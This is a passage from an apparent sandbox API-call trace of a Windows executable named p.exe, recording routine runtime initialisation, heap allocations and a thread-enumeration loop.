\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿæ\x99ËÃ\x18ù\x18", lpUsedDefaultChar=0x0) returned 256 [0049.662] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x457528, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe")) returned 0x2b [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetLastError () returned 0x0 [0049.662] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetLastError () returned 0x0 [0049.663] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetLastError () returned 0x0 [0049.664] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.665] SetLastError (dwErrCode=0x0) [0049.665] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] GetLastError () returned 0x0 [0049.666] SetLastError (dwErrCode=0x0) [0049.666] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x34) returned 0x251990 [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.667] GetLastError () returned 0x0 [0049.667] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.668] GetLastError () returned 0x0 [0049.668] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.669] SetLastError (dwErrCode=0x0) [0049.669] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.670] SetLastError (dwErrCode=0x0) [0049.670] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.671] SetLastError (dwErrCode=0x0) [0049.671] GetLastError () returned 0x0 [0049.672] SetLastError (dwErrCode=0x0) [0049.672] GetLastError () returned 0x0 [0049.672] SetLastError (dwErrCode=0x0) [0049.672] GetLastError () returned 0x0 [0049.672] SetLastError (dwErrCode=0x0) [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x98) returned 0x2519d0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1f) returned 0x251a70 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x251a98 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x37) returned 0x251ad8 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x251b18 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x31) returned 0x251b60 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x17) returned 0x251ba0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x251bc0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x251bf0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xd) returned 0x251c10 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x25) returned 0x251c28 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x39) returned 0x251c58 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x251ca0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x17) returned 0x251cc0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe) returned 0x251ce0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x69) returned 0x251cf8 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x251d70 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1b) returned 0x251db8 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1d) returned 0x251de0 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x251e08 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12) returned 0x251e58 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x251e78 [0049.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1b) returned 0x251e98 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x251ec0 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x29) returned 0x251ef0 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e) returned 0x251f28 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x41) returned 0x251f50 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x17) returned 0x251fa0 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xf) returned 0x251fc0 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x251fd8 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x251ff8 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x29) returned 0x252030 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x15) returned 0x252068 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e) returned 0x252088 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x2520b0 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12) returned 0x2520e8 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x252108 [0049.673] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x46) returned 0x252128 [0049.673] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2509f0 | out: hHeap=0x250000) returned 1 [0049.675] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x80) returned 0x2509f0 [0049.675] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x252178 [0049.675] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2509f0) returned 0x80 [0049.680] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x50) returned 0x250a78 [0049.680] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2c) returned 0x250ad0 [0049.681] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x100) returned 0x250b08 [0049.681] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c) returned 0x250c10 [0049.681] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4c) returned 0x250c38 [0049.681] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0xbc [0049.685] Thread32First (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.685] GetCurrentProcessId () returned 0xaec [0049.685] GetCurrentThreadId () returned 0xae0 [0049.686] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.686] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.686] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.686] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.687] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.687] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.687] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.688] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.688] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.688] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.688] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.689] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.689] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.689] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.689] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.690] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.690] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.690] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.690] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.691] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.691] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.691] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.691] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.692] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.692] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.692] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.693] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.693] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.693] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.693] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.694] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.694] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.694] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.694] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.695] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.695] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.695] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.696] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.696] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.696] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.696] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.697] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.697] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.697] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.698] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.698] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.698] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.698] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.699] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.699] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.699] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.699] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.700] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.700] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.700] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.700] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.701] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.701] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.701] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.702] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.703] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.703] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.703] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.703] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.704] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.704] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.704] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.704] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.705] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.705] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.705] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.705] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.706] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.706] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.706] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.707] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.707] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.707] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.707] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.708] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.708] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.708] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.708] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.709] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.709] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.709] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.709] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.710] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.710] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.710] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.710] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.711] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.711] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.711] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.711] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.712] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.712] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.712] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.712] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.713] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.713] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.713] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.713] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.714] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.714] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.714] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.715] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.715] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.715] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.716] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.716] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.716] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.716] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.717] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.717] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.717] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.718] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.718] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.718] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.718] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.719] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.719] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.719] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.719] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.720] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.720] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.720] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.720] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.721] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.721] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.721] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.722] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.722] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.722] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.722] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.723] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.723] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.723] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.723] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.724] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.724] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.724] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.724] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.725] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.725] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.725] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.726] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.726] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.726] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.726] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.727] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.727] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.727] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.727] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.728] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.728] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.728] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.728] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.729] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.729] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.729] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.729] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.730] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.730] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.730] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.731] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.731] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.731] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.731] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.732] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.732] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.732] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.732] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.733] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.733] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.733] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.733] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 